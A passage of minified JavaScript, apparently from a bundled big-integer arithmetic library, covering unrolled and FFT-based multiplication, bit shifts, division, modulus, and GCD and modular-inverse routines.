Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return 